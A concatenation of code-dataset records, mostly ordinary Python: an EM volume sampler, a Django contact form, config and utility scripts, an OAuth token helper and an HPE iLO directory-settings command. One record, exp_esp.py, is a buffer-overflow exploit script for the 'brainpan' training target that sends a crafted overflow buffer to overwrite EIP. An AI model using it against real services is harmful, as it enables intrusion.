of each TensorData.\n \"\"\"\n assert self.has_spec()\n # Valid range.\n vr = None\n for key, dim in self._spec.items():\n if key in self._data:\n # Update patch size.\n self._data[key].set_fov(dim[-3:])\n # Update valid range.\n r = self._data[key].range()\n vr = r if vr is None else vr.intersect(r)\n self._range = vr\n\n\n########################################################################\n## VolumeDataset demo.\n########################################################################\n\nif __name__ == \"__main__\":\n\n import argparse\n import h5py\n import os\n import time\n\n from . import emio\n from . 
import transform\n\n dsc = 'VolumeDataset demo.'\n parser = argparse.ArgumentParser(description=dsc)\n\n parser.add_argument('z', type=int, help='sample z dim.')\n parser.add_argument('y', type=int, help='sample y dim.')\n parser.add_argument('x', type=int, help='sample x dim.')\n parser.add_argument('img', help='image file (h5 or tif) path.')\n parser.add_argument('lbl', help='label file (h5 or tif) path.')\n\n args = parser.parse_args()\n\n # Load data.\n img = emio.imread(args.img)\n lbl = emio.imread(args.lbl)\n\n # Preprocess.\n img = transform.divideby(img, val=255.0)\n\n # Create dataset and add data.\n vdset = VolumeDataset()\n vdset.add_raw_data(key='input', data=img)\n vdset.add_raw_data(key='label', data=lbl)\n\n # Random sample.\n size = (args.z, args.y, args.x)\n spec = dict(input=size, label=size)\n vdset.set_spec(spec)\n sample = vdset.random_sample()\n\n # Dump a single random sample.\n print('Save as file...')\n fname = 'sample.h5'\n if os.path.exists(fname):\n os.remove(fname)\n # Open explicitly in write mode; recent h5py versions default to read-only.\n f = h5py.File(fname, 'w')\n for key, data in sample.items():\n f.create_dataset('/' + key, data=data)\n f.close()\n","sub_path":"python/dataprovider/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
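The sampling path in the record above (valid range, then a random center, then a center-aligned patch) can be illustrated without the package's Box/TensorData machinery. A minimal standalone NumPy sketch; `random_centered_patch` is a hypothetical helper, not part of the dataprovider package:

```python
# Standalone sketch of the core idea behind VolumeDataset.random_sample:
# pick a center such that a fov-sized patch stays inside the volume,
# then slice the patch out around that center.
import numpy as np

def random_centered_patch(volume, fov, rng=np.random):
    """volume: 3D array (z, y, x); fov: patch size per axis."""
    fov = np.asarray(fov)
    shape = np.asarray(volume.shape)
    top = fov // 2            # margin above/left of the center
    btm = fov - top - 1       # margin below/right of the center
    lo, hi = top, shape - btm # valid centers: [lo, hi) per axis
    assert np.all(lo < hi), "patch larger than volume"
    center = np.array([rng.randint(l, h) for l, h in zip(lo, hi)])
    z, y, x = center - top
    fz, fy, fx = fov
    return volume[z:z+fz, y:y+fy, x:x+fx]

vol = np.arange(4 * 5 * 6).reshape(4, 5, 6)
patch = random_centered_patch(vol, (3, 3, 3))
assert patch.shape == (3, 3, 3)
```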
+{"seq_id":"309472596","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# exp for brainpain\n\nimport sys\nfrom time import sleep\nimport socket\n\n# bsize = int(sys.argv[3])\n\ndef attack(dst, dst_port, data):\n try:\n socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socks.connect((dst, dst_port))\n conn = socks.recv(1024)\n # print(conn)\n\n dd = data.encode('utf-8')\n socks.send(dd)\n print(\"Sending buffer: {}\".format(dd))\n # print(conn)\n except socket.error as err:\n print(\"Socket connect failed! {}\".format(err))\n finally:\n sleep(0.5)\n socks.close()\n\nif __name__ == '__main__':\n\n # buffer create python -c 'print(\"A\"*100)'\n # control esp\n\n junk = 'A'* 524 # ebp fill with 524 bytes 41414141\n eip = 'B' * 4 # eip register will be fill with B 42424242\n block = 'C' * (1000 - 524 - 4) # esp will be fill with C block 43434343\n buff = junk + eip + block\n\n host = str(sys.argv[1])\n port = int(sys.argv[2])\n\n attack(host, port, buff)\n","sub_path":"brainpan/exp_esp.py","file_name":"exp_esp.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"149690636","text":"from django.shortcuts import render, redirect, HttpResponse\nfrom .forms import formulario_contacto\nfrom django.core.mail import send_mail, EmailMultiAlternatives\nfrom ProyectoFinal.settings import EMAIL_HOST_USER\nfrom django.contrib import messages\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\n\n# Create your views here.\n\n\ndef contacto(request):\n\n formulario = formulario_contacto()\n\n if request.method == 'POST':\n formulario = formulario_contacto(request.POST)\n if formulario.is_valid():\n nombre = request.POST.get('nombre')\n email = request.POST.get('email')\n tfno = request.POST.get('tfno')\n mensaje = request.POST.get('mensaje')\n\n html_content = render_to_string(\n 'form_contacto/email_template.html', {'title': 'Test email', 'content': mensaje, 'email': email, 'tfno': tfno})\n\n text_content = strip_tags(html_content)\n\n email = EmailMultiAlternatives('Mensaje de: ' + nombre, 'Nombre: {} \\n Email: {} \\n Tfno: {} \\n Mensaje: {}'.format(\n nombre, email, tfno, text_content), email, ['ferranguillem8@gmail.com'])\n\n email.attach_alternative(html_content, 'text/html')\n email.send()\n\n messages.success(request, 'Mensaje enviado con éxito')\n try:\n\n return redirect('/contacto/?valido')\n\n except:\n messages.error(request, 'Ups! Ha ocurrido un error')\n return redirect('/contacto/?error')\n else:\n messages.error(request, 'Ups! Ha ocurrido un error')\n return redirect('/contacto/?error')\n\n return render(request, 'form_contacto/contacto.html', {'formulario': formulario})\n","sub_path":"ContactoApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"65265566","text":"# -*- coding:utf-8 -*-\n# Author: owhileo\n# Date: 2019-8-8\n# Version: 1.0\n\nimport json\n\n\ndef read_json(path):\n with open(path, 'r', encoding='utf-8') as f:\n data = json.load(f)\n return data\n\n\ndef find_new(data):\n summ = 0\n for x in data:\n label = True\n for y in x['records']:\n if y['label'] == 9:\n label = False\n if not label:\n break\n summ += 1\n print(\"newest car:{}\".format(summ))\n\n\nif __name__ == '__main__':\n dat = read_json(r'data4.json')\n find_new(dat)\n","sub_path":"while/fine_newest.py","file_name":"fine_newest.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"464622651","text":"import numpy as np\nfrom i2c.exp_types import GaussianI2c, CubatureQuadrature\n\nENVIRONMENT = \"LinearKnown\" # environment to control\n\n# top level training parameters\nN_DURATION = 60\nN_EPISODE = 1\nN_INFERENCE = 10\nN_AUG = 0\nN_STARTING = 0\nN_ITERS_PER_PLOT = 1 # N_INFERENCE + 1\nPOLICY_COVAR = 0 * np.eye(1)\nN_PLOTS = 1\n\n# model learning\nMODEL = None\n\n# input inference\nquad = CubatureQuadrature(1, 0, 0)\nINFERENCE = GaussianI2c(\n inference=quad,\n Q=np.diag([10.0, 10.0]),\n R=np.diag([1.0]),\n Qf=np.diag([10.0, 10.0]),\n alpha=800.0,\n alpha_update_tol=0.0,\n mu_u=np.zeros((N_DURATION, 1)),\n sig_u=1.0 * np.eye(1),\n mu_x_term=None,\n sig_x_term=None,\n)\n","sub_path":"scripts/experiments/linear_known_quad.py","file_name":"linear_known_quad.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"310693132","text":"from optparse import make_option\nfrom django.core.management.base import BaseCommand\nimport os\nfrom extract.LillyDownloader import LillyDownloader\nfrom index.es_index import ESTrialIndexer\n\nFILE_DIR = os.path.dirname(os.path.realpath(__file__))\n\n\nclass Command(BaseCommand):\n help = \"Elasticsearch - index json files containing study data from clinicaltrials.gov with option to download\"\n\n option_list = BaseCommand.option_list + (\n make_option('--data',\n dest='data',\n help='data directory containing json files'),\n make_option('--download',\n dest='download',\n help='True or False to download data from Lilly',\n default=False),\n make_option('--limit',\n dest='limit',\n help='the number of files to download from Lilly',\n default='100'),\n make_option('--doc_type',\n dest='doc_type',\n help='the document type used in indexing',\n default='study'),\n make_option('--index',\n dest='index',\n help='the name of the index',\n default='ctgov'),\n make_option('--autocomplete',\n dest='autocomplete',\n help='generate text files to use in autocomplete',\n default=False)\n )\n\n def handle(self, *args, **options):\n if options['download']:\n lilly = LillyDownloader(options['limit'], None, options['data'])\n indexer = ESTrialIndexer(options['data'], lilly, options['limit'], options['doc_type'], options['index'])\n indexer.download()\n else:\n loader = ESTrialIndexer(options['data'], None, options['limit'], options['doc_type'], options['index'])\n loader.index_data()\n\n\n","sub_path":"studies/lilly/management/commands/index_studies.py","file_name":"index_studies.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"255009876","text":"'''\n# -*- coding: utf-8 -*-\n# /***************************************************************************/\n# * __________________________________\n# * METIS CYBERSPACE TECHNOLOGY S.A.\n# * www.metis.tech\n# * __________________________________\n# * [2017] All Rights Reserved.\n# *\n# * NOTICE: All information contained herein is, and remains\n# * the property of Metis CyberSpace Technology and its suppliers,\n# * if any. The intellectual and technical concepts contained\n# * herein are proprietary to METIS CYBERSPACE TECHNOLOGY\n# * and its suppliers and may be covered by European and Foreign Patents,\n# * patents in process, and are protected by trade secret or copyright law.\n# * Dissemination of this information or reproduction of this material\n# * is strictly forbidden unless prior written permission is obtained\n# * from Metis Cyberspace Technology.\n#\n# /***************************************************************************/\nFile: Authorization.py\nFile Created: Tuesday, 9th October 2018 3:59:20 pm\nAuthor: alverto.benroumpi (alverto.benroumpi@metis.tech)\n'''\nimport base64\nimport requests\nfrom metis_pylib import LOGGER\n\nclass Authorization:\n\n \n def getToken(self, env_vars):\n self.env_vars = env_vars\n self.auth_url = self.env_vars['auth_url']\n self.client_id = self.env_vars['client_id']\n self.client_secret = self.env_vars['client_secret']\n\n auth = base64.b64encode((self.client_id + ':' + self.client_secret).encode('utf-8'))\n token = requests.post(self.auth_url,\n headers={'Authorization': 'Basic ' + auth.decode(\"utf-8\")},\n data={'grant_type': 'client_credentials'})\n if token.status_code == 200:\n token = token.json()['access_token']\n return token\n else:\n LOGGER.error('Failed to obtain token, status code is ' + str(token.status_code))\n return []","sub_path":"Metis/metis-pylib/metis_pylib/security/Authorization.py","file_name":"Authorization.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"130613178","text":"# -*- coding:utf-8 -*-\n\nimport pickle\nd = dict(name='Bob', age=20, score=88)\npickling1 = pickle.dumps(d)\nprint(pickling1)\na = dict()\n\nwith open('D:/Learn-Python/test/dump.txt', 'wb') as f:\n pickle.dump(d, f)\n print(d)\n\nwith open('D:/Learn-Python/test/dump.txt', 'rb') as f:\n a = pickle.load(f)\n print(a)\n","sub_path":"study_doc/lxf_Tutorial/IO编程/序列化.py","file_name":"序列化.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"567638793","text":"###\n# Copyright 2017 Hewlett Packard Enterprise, Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n###\n\n# -*- coding: utf-8 -*-\n\"\"\" Directory Command for rdmc \"\"\"\n\nimport re\nimport sys\nimport getpass\n\nfrom argparse import ArgumentParser, REMAINDER, Action\n\nfrom redfish.ris.rmc_helper import IloResponseError\n\nfrom rdmc_base_classes import RdmcCommandBase, add_login_arguments_group\nfrom rdmc_helper import ReturnCodes, InvalidCommandLineError, IncompatibleiLOVersionError,\\\n InvalidCommandLineErrorOPTS, NoContentsFoundForOperationError, UI,\\\n ResourceExists, Encryption\n\nclass _DirectoryParse(Action):\n def __init__(self, option_strings, dest, nargs, **kwargs):\n super(_DirectoryParse, self).__init__(option_strings, dest, nargs, **kwargs)\n def __call__(self, parser, namespace, values, option_strings):\n \"\"\" Helper for parsing options \"\"\"\n if option_strings.endswith('disable'):\n setattr(namespace, self.dest, False)\n elif option_strings.endswith('enable'):\n setattr(namespace, self.dest, True)\n elif option_strings.endswith('enablelocalauth'):\n setattr(namespace, self.dest, False)\n elif option_strings.endswith('disablelocalauth'):\n setattr(namespace, self.dest, True)\n elif option_strings == '--removerolemap':\n setattr(namespace, self.dest, {'remove': []})\n for role in next(iter(values)).split(','):\n role = role.replace('\"', '')\n if role:\n namespace.roles['remove'].append(role)\n elif option_strings == '--addrolemap':\n setattr(namespace, self.dest, {'add': []})\n for role in next(iter(values)).split(','):\n role = role.replace('\"', '')\n if role and re.match('.*:.*', role):\n namespace.roles['add'].append(role)\n else:\n try:\n parser.error(\"Supply roles to add in form :\")\n except:\n raise InvalidCommandLineErrorOPTS(\"\")\n elif option_strings == '--addsearch':\n setattr(namespace, self.dest, {'add': []})\n for search in next(iter(values)).split(','):\n if search:\n namespace.search['add'].append(search)\n elif option_strings == '--removesearch':\n setattr(namespace, self.dest, {'remove': []})\n for search in next(iter(values)).split(','):\n if search:\n namespace.search['remove'].append(search)\n\nclass DirectoryCommand(RdmcCommandBase):\n \"\"\" Update directory settings on the server \"\"\"\n def __init__(self, rdmcObj):\n RdmcCommandBase.__init__(self,\\\n name='directory',\\\n usage='directory [kerberos/ldap/test] [OPTIONS]\\n\\n\\t'\\\n 'Add credentials, service address, two search strings, and enable LDAP directory'\\\n ' service.\\n\\texample: directory ldap --serviceaddress x.x.y.z --addsearch string1,'\\\n 'string2 --enable username password\\n\\n\\tAdd service address, port, and realm for '\\\n 'Kerberos.\\n\\texample: directory kerberos --serviceaddress x.x.y.z --port 8888 '\\\n '--realm arealm\\n\\n\\tAdd 2 directory roles.\\n\\texample: directory ldap --addrolemap '\\\n '\"LocalRole1:RemoteGroup3,LocalRole2:RemoteGroup4:SID\"\\n\\n\\tRemove 2 directory '\\\n 
'roles.\\n\\texample: directory ldap --removerolemap LocalRole1,LocalRole2\\n\\n\\tStart a '\\\n 'directory test.\\n\\texample: directory test start\\n\\n\\tStop a directory test\\n\\t'\\\n 'example: directory test stop\\n\\n\\tView results of the last directory test.\\n\\t'\\\n 'example: directory test viewresults\\n\\n\\tNOTE: When adding role map SID is optional.',\\\n summary='Update directory settings, add/delete directory roles, and test directory '\\\n 'settings.',\\\n aliases=['ad', 'activedirectory'],\\\n argparser=ArgumentParser())\n self.definearguments(self.parser)\n self._rdmc = rdmcObj\n self.typepath = rdmcObj.app.typepath\n self.lobobj = rdmcObj.commands_dict[\"LoginCommand\"](rdmcObj)\n\n def run(self, line):\n \"\"\"Main directory Function\n\n :param line: string of arguments passed in\n :type line: str.\n \"\"\"\n try:\n (options, args) = self._parse_arglist(line)\n except (InvalidCommandLineErrorOPTS, SystemExit):\n if (\"-h\" in line) or (\"--help\" in line):\n return ReturnCodes.SUCCESS\n else:\n raise InvalidCommandLineErrorOPTS(\"\")\n\n self.directoryvalidation(options)\n if self._rdmc.app.getiloversion() < 5.140:\n raise IncompatibleiLOVersionError(\"Directory settings are only available on \"\\\n \"iLO 5 1.40 or greater.\")\n if len(args) < 1 or len(args) > 3:\n raise InvalidCommandLineError(\"Invalid number of arguments entered.\")\n elif len(args) == 3 and args[0].lower() == 'kerberos':\n raise InvalidCommandLineError(\"Username and password can only be set for LDAP.\")\n elif len(args) == 2 and args[0].lower() in ['ldap']:\n sys.stdout.write('Please input the password for the directory.\\n')\n tempinput = getpass.getpass()\n args.extend([tempinput])\n\n elif len(args) == 2 and args[0].lower() == 'test':\n if not args[1] in ['start', 'stop', 'viewresults']:\n raise InvalidCommandLineError('Please input \"start\" to start the directory test, '\\\n '\"stop\" to stop the directory test, or \"viewresults\" to see the results of'\\\n ' the last directory test.')\n\n results = None\n\n if args[0].lower() == 'ldap':\n if options.realm or options.keytab:\n raise InvalidCommandLineError(\"Keytab and Realm options are not available for \"\\\n \"LDAP.\")\n try:\n results = self._rdmc.app.select(selector='AccountService.', rel=True)[0].dict\n path = results[self._rdmc.app.typepath.defs.hrefstring]\n oem = results['Oem'][self.typepath.defs.oemhp]\n local_auth = results['LocalAccountAuth']\n results = results['LDAP']\n name = 'LDAP'\n except (KeyError, IndexError):\n raise NoContentsFoundForOperationError(\"Unable to gather LDAP settings.\")\n\n elif args[0].lower() == 'kerberos':\n if options.authmode or options.search:\n raise InvalidCommandLineError(\"Authentication and add/remove search options \"\\\n \"are not available for Kerberos.\")\n try:\n results = self._rdmc.app.select(selector='AccountService.', rel=True)[0].dict\n path = results[self._rdmc.app.typepath.defs.hrefstring]\n oem = results['Oem'][self.typepath.defs.oemhp]\n local_auth = results['LocalAccountAuth']\n results = results['ActiveDirectory']\n name = 'ActiveDirectory'\n except (KeyError, IndexError):\n raise NoContentsFoundForOperationError(\"Unable to gather Kerberos settings.\")\n\n elif not args[0].lower() == 'test':\n raise InvalidCommandLineError(\"Please choose LDAP, Kerberos to read or modify \"\\\n \"directory settings or test to test directory settings.\")\n\n if results:\n keytab = None\n payload = {}\n if options.keytab:\n keytab = options.keytab\n try:\n directory_settings = 
self.directory_helper(results, options, args[1], args[2])\n except IndexError:\n directory_settings = self.directory_helper(results, options)\n\n if directory_settings:\n payload[name] = directory_settings\n\n if options.authmode:\n payload.update({'Oem':{'Hpe':{'DirectorySettings': \\\n {'LdapAuthenticationMode': options.authmode}}}})\n\n if not payload and not keytab:\n if options.json:\n UI().print_out_json({name: results, 'LocalAccountAuth': local_auth, \\\n \"Oem\": {\"Hpe\": oem}})\n else:\n self.print_settings(results, oem, local_auth, name)\n\n if payload:\n if options.localauth:\n payload['LocalAccountAuth'] = 'Enabled' if options.localauth else 'Disabled'\n sys.stdout.write(\"Changing settings...\\n\")\n try:\n self._rdmc.app.patch_handler(path, payload)\n except IloResponseError:\n if len(args) == 3 and not results['ServiceEnabled']:\n sys.stderr.write(\"You must enable this directory service before or during\"\\\n \" assignment of username and password. Try adding the flag --enable.\\n\")\n raise IloResponseError(\"\")\n else:\n raise\n if keytab:\n path = oem['Actions'][next(iter(oem['Actions']))]['target']\n sys.stdout.write(\"Adding keytab...\\n\")\n self._rdmc.app.post_handler(path, {\"ImportUri\": keytab})\n else:\n self.test_directory(args[1], json=options.json)\n\n return ReturnCodes.SUCCESS\n\n def directory_helper(self, settings, options, username=None, password=None):\n \"\"\" Helper function to set the payload based on options and arguments\n\n :param settings: dictionary to change\n :type settings: dict.\n :param options: list of options\n :type options: list.\n :param username: username to apply\n :type username: str.\n :param password: password to apply\n :type password: str.\n \"\"\"\n\n payload = {}\n serviceaddress = None\n\n if isinstance(options.serviceaddress, str):\n serviceaddress = options.serviceaddress\n if serviceaddress == '\"\"' or serviceaddress == \"''\":\n serviceaddress = ''\n if isinstance(options.port, str):\n if serviceaddress is None:\n serviceaddress = settings['ServiceAddresses'][0]\n serviceaddress = serviceaddress + ':' + options.port\n if isinstance(options.realm, str):\n if serviceaddress is None:\n serviceaddress = settings['ServiceAddresses'][0]\n if options.realm == '\"\"' or options.realm == \"''\":\n options.realm = ''\n serviceaddress = serviceaddress + '@' + options.realm\n if not serviceaddress is None:\n payload['ServiceAddresses'] = [serviceaddress]\n\n if not options.enable is None:\n payload['ServiceEnabled'] = options.enable\n\n if username and password:\n payload.update({\"Authentication\":{\"Username\": username, \"Password\": password}})\n\n if options.roles:\n payload['RemoteRoleMapping'] = self.role_helper(options.roles, \\\n settings['RemoteRoleMapping'])\n\n if options.search:\n payload.update({\"LDAPService\": {\"SearchSettings\": self.search_helper(options.search, \\\n settings['LDAPService']['SearchSettings'])}})\n\n return payload\n\n def test_directory(self, command, json=False):\n \"\"\" Function to perform directory testing\n\n :param command: command to run against directory test. 
(start/stop/viewresults)\n :type command: str.\n :param json: Bool to print in json format or not.\n :type json: bool.\n \"\"\"\n results = self._rdmc.app.select(selector='HpeDirectoryTest.', rel=True)[0].dict\n if command.lower() == 'start':\n path = None\n for item in results['Actions']:\n if 'StartTest' in item:\n path = results['Actions'][item]['target']\n break\n if not path:\n raise NoContentsFoundForOperationError(\"Unable to start directory test.\")\n sys.stdout.write(\"Starting the directory test. Monitor results with command: directory\"\\\n \" viewresults\\n\")\n self._rdmc.app.post_handler(path, {})\n elif command.lower() == 'stop':\n path = None\n for item in results['Actions']:\n if 'StopTest' in item:\n path = results['Actions'][item]['target']\n break\n if not path:\n raise NoContentsFoundForOperationError(\"Unable to stop directory test.\")\n sys.stdout.write(\"Stopping the directory test.\\n\")\n self._rdmc.app.post_handler(path, {})\n elif command.lower() == 'viewresults':\n if json:\n UI().print_out_json(results['TestResults'])\n else:\n for test in results['TestResults']:\n sys.stdout.write('Test: %s\\n' % test['TestName'])\n sys.stdout.write(\"------------------------\\n\")\n sys.stdout.write('Status: %s\\n' % test['Status'])\n sys.stdout.write('Notes: %s\\n' % test['Notes'])\n sys.stdout.write(\"\\n\")\n\n def print_settings(self, settings, oem_settings, local_auth_setting, name):\n \"\"\" Pretty print settings of LDAP or Kerberos\n\n :param settings: settings to print\n :type settings: dict.\n :param oem_settings: oem_settings to print\n :type oem_settings: dict.\n :param local_auth_settings: local authorization setting\n :type local_auth_settings: str.\n :param name: type of setting (activedirectory or ldap)\n :type name: str.\n \"\"\"\n sys.stdout.write(\"%s settings:\\n\" % ('Kerberos' if name == 'ActiveDirectory' else name))\n sys.stdout.write(\"--------------------------------\\n\")\n sys.stdout.write(\"Enabled: %s\\n\" % str(settings['ServiceEnabled']))\n\n serviceaddress = settings['ServiceAddresses'][0]\n\n sys.stdout.write(\"Service Address: %s\\n\" % (serviceaddress if serviceaddress else \\\n \"Not Set\"))\n\n sys.stdout.write(\"Local Account Authorization: %s\\n\" % local_auth_setting)\n\n if name.lower() == 'activedirectory':\n address_settings = oem_settings['KerberosSettings']\n sys.stdout.write(\"Port: %s\\n\" % address_settings['KDCServerPort'])\n\n sys.stdout.write(\"Realm: %s\\n\" % (address_settings['KerberosRealm'] if \\\n address_settings['KerberosRealm'] else \"Not Set\"))\n else:\n address_settings = oem_settings['DirectorySettings']\n sys.stdout.write(\"Port: %s\\n\" % address_settings['LdapServerPort'])\n sys.stdout.write(\"Authentication Mode: %s\\n\" % \\\n address_settings['LdapAuthenticationMode'])\n\n sys.stdout.write(\"Search Settings:\\n\")\n try:\n count = 1\n for search in settings['LDAPService']['SearchSettings'][\"BaseDistinguishedNames\"]:\n sys.stdout.write(\"\\tSearch %s: %s\\n\" % (count, search))\n count += 1\n except KeyError:\n sys.stdout.write(\"\\tNo Search Settings\\n\")\n\n sys.stdout.write(\"Remote Role Mapping(s):\\n\")\n for role in settings['RemoteRoleMapping']:\n sys.stdout.write(\"\\tLocal Role: %s\\n\" % role['LocalRole'])\n sys.stdout.write(\"\\tRemote Group: %s\\n\" % role['RemoteGroup'])\n\n def role_helper(self, new_roles, curr_roles):\n \"\"\" Helper to prepare adding and removing roles for patching\n\n :param new_roles: dictionary of new roles to add or remove\n :type new_roles: dict.\n :param curr_roles: 
list of current roles on the system\n :type curr_roles: list.\n \"\"\"\n final_roles = curr_roles\n if 'add' in new_roles:\n for role in new_roles['add']:\n role = role.split(':', 1)\n if not self.duplicate_group(role[1], curr_roles):\n final_roles.append({\"LocalRole\":role[0], \"RemoteGroup\":role[1]})\n else:\n raise ResourceExists('Group DN \"%s\" already exists.' % role[1].split(':')[0])\n if 'remove' in new_roles:\n removed = False\n for role in new_roles['remove']:\n removed = False\n for item in reversed(final_roles):\n if item['LocalRole'] == role:\n del final_roles[final_roles.index(item)]\n removed = True\n break\n if not removed:\n raise InvalidCommandLineError(\"Unable to find local role %s to delete\" % role)\n\n return final_roles\n\n def duplicate_group(self, group_dn, curr_roles):\n \"\"\" Checks if new role is a duplicate\n\n :param group_dn: group distinguished name from user\n :type group_dn: str.\n :param curr_roles: list of current roles\n :type curr_roles: list.\n \"\"\"\n group_dn = group_dn.split(':')[0]\n for item in curr_roles:\n comp_dn = item[\"RemoteGroup\"].split(':')[0]\n if comp_dn == group_dn:\n return True\n return False\n\n def search_helper(self, new_searches, curr_searches):\n \"\"\" Helper to prepare search strings for patching\n\n :param new_searches: dictionary of new searches to add\n :type new_searches: dict.\n :param curr_searches: dictionary of current search settings\n :type curr_searches: dict.\n \"\"\"\n final_searches = curr_searches\n\n if 'add' in new_searches:\n if 'BaseDistinguishedNames' in final_searches:\n for search in new_searches['add']:\n final_searches['BaseDistinguishedNames'].append(search)\n else:\n final_searches['BaseDistinguishedNames'] = new_searches['add']\n elif 'remove' in new_searches:\n to_remove = []\n\n if 'BaseDistinguishedNames' not in curr_searches:\n raise NoContentsFoundForOperationError(\"No search strings to remove\")\n\n for search in new_searches['remove']:\n if search in curr_searches['BaseDistinguishedNames']:\n to_remove.append(search)\n else:\n raise InvalidCommandLineError(\"Unable to find search %s to delete\" % search)\n for item in to_remove:\n final_searches['BaseDistinguishedNames'].remove(item)\n\n if not final_searches['BaseDistinguishedNames']:\n sys.stdout.write('Attempting to delete all searches.\\n')\n final_searches['BaseDistinguishedNames'].append(\"\")\n\n return final_searches\n\n def directoryvalidation(self, options):\n \"\"\" directory validation function\n\n :param options: command line options\n :type options: list.\n \"\"\"\n client = None\n inputline = list()\n\n try:\n client = self._rdmc.app.current_client\n except Exception:\n if options.user or options.password or options.url:\n if options.url:\n inputline.extend([options.url])\n if options.user:\n if options.encode:\n options.user = Encryption.decode_credentials(options.user)\n inputline.extend([\"-u\", options.user])\n if options.password:\n if options.encode:\n options.password = Encryption.decode_credentials(options.password)\n inputline.extend([\"-p\", options.password])\n if options.https_cert:\n inputline.extend([\"--https\", options.https_cert])\n else:\n if self._rdmc.app.config.get_url():\n inputline.extend([self._rdmc.app.config.get_url()])\n if self._rdmc.app.config.get_username():\n inputline.extend([\"-u\", self._rdmc.app.config.get_username()])\n if self._rdmc.app.config.get_password():\n inputline.extend([\"-p\", self._rdmc.app.config.get_password()])\n if self._rdmc.app.config.get_ssl_cert():\n inputline.extend([\"--https\", 
self._rdmc.app.config.get_ssl_cert()])\n\n if inputline:\n self.lobobj.loginfunction(inputline)\n elif not client:\n raise InvalidCommandLineError(\"Please login or pass credentials\" \\\n \" to complete the operation.\")\n\n def definearguments(self, customparser):\n \"\"\" Wrapper function for new command main function\n\n :param customparser: command line input\n :type customparser: parser.\n \"\"\"\n if not customparser:\n return\n\n add_login_arguments_group(customparser)\n\n customparser.add_argument(\n '--enable',\n '--disable',\n dest='enable',\n type=str,\n nargs=REMAINDER,\n action=_DirectoryParse,\n help=\"Optionally add this flag to enable or disable LDAP or Kerberos services.\",\n default=None,\n )\n customparser.add_argument(\n '--serviceaddress',\n dest='serviceaddress',\n help=\"Optionally include this flag to set the service address of the LDAP or \"\\\n \"Kerberos Services.\",\n default=None,\n )\n customparser.add_argument(\n '--port',\n dest='port',\n help=\"Optionally include this flag to set the port of the LDAP or Kerberos services.\",\n default=None,\n )\n customparser.add_argument(\n '--realm',\n dest='realm',\n help=\"Optionally include this flag to set the Kerberos realm.\",\n default=None,\n )\n customparser.add_argument(\n '--keytab',\n dest='keytab',\n help=\"Optionally include this flag to import a Kerberos Keytab by its URI location.\",\n default=\"\",\n )\n customparser.add_argument(\n '--enablelocalauth',\n '--disablelocalauth',\n dest='localauth',\n nargs=REMAINDER,\n type=str,\n action=_DirectoryParse,\n help=\"Optionally include this flag if you wish to enable or disable authentication \"\\\n \"for local accounts.\",\n default=None\n )\n customparser.add_argument(\n '--authentication',\n dest='authmode',\n choices=['DefaultSchema', 'ExtendedSchema'],\n help=\"Optionally include this flag if you would like to choose an LDAP authentication \"\n \"mode. Valid choices are: DefaultSchema (Directory Default Schema or Schema-free) or \"\\\n \"ExtendedSchema (HPE Extended Schema).\",\n default=None\n )\n customparser.add_argument(\n '--addsearch',\n '--removesearch',\n dest='search',\n nargs=REMAINDER,\n action=_DirectoryParse,\n help=\"Optionally add this flag to add or remove search strings for \"\\\n \"generic LDAP services. EX: --addsearch search1,search2\",\n type=str,\n default={},\n )\n customparser.add_argument(\n '--addrolemap',\n '--removerolemap',\n dest='roles',\n nargs=REMAINDER,\n action=_DirectoryParse,\n help=\"Optionally add this flag to add or remove Role Mapping(s) for the LDAP and \"\\\n \"Kerberos services. Remove EX: --removerolemap LocalRole1,LocalRole2 \"\\\n 'Add EX: --addrolemap \"LocalRole1:RemoteGroup3,LocalRole2:RemoteGroup4\"',\n type=str,\n default={},\n )\n customparser.add_argument(\n '-j',\n '--json',\n dest='json',\n action=\"store_true\",\n help=\"Optionally include this flag if you wish to change the\"\\\n \" displayed output to JSON format. Preserving the JSON data\"\\\n \" structure makes the information easier to parse.\",\n default=False\n )\n","sub_path":"src/extensions/iLO COMMANDS/DirectoryCommand.py","file_name":"DirectoryCommand.py","file_ext":"py","file_size_in_byte":25328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
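The `--addrolemap` validation in the record above reduces to a small parsing rule; a standalone sketch under that reading (`parse_rolemap` is a hypothetical name, not part of rdmc):

```python
# Each comma-separated entry must contain a colon: LocalRole:RemoteGroup.
import re

def parse_rolemap(value):
    roles = []
    for role in value.replace('"', '').split(','):
        if role and re.match('.*:.*', role):
            roles.append(role)
        elif role:
            raise ValueError("Supply roles to add in form LocalRole:RemoteGroup")
    return roles

assert parse_rolemap("LocalRole1:RemoteGroup3,LocalRole2:RemoteGroup4") == [
    "LocalRole1:RemoteGroup3", "LocalRole2:RemoteGroup4"]
```

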